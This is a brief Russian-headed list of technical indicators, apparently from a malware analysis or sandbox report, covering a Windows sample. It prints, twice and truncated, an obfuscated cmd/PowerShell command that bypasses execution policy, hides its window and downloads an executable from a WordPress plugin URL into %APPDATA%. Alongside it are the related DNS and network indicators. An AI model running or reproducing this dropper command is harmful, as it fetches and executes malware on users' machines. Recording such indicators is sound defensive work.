Техническая информация
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Ow^ERSH^Ell^.^Ex^e^ -e^x^eCut^IOnPoL^I^c^y^ by^PAs^S^ ^-nOPRof^ile^ -w^In^doWStY^LE HI^dde^n (^ne^W-ob^j^ect sysTEM.net.W^e^BcLIE^N^T).DOW^n^loadFI^L^e^('http://nsholiday.com/wp-conte...
- %APPDATA%.exe
- 'ns###iday.com':80
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
- DNS ASK ns###iday.com
- '<SYSTEM32>\cmd.exe' /c "P^Ow^ERSH^Ell^.^Ex^e^ -e^x^eCut^IOnPoL^I^c^y^ by^PAs^S^ ^-nOPRof^ile^ -w^In^doWStY^LE HI^dde^n (^ne^W-ob^j^ect sysTEM.net.W^e^BcLIE^N^T).DOW^n^loadFI^L^e^('http://nsholiday.com/wp-conte...' (со скрытым окном)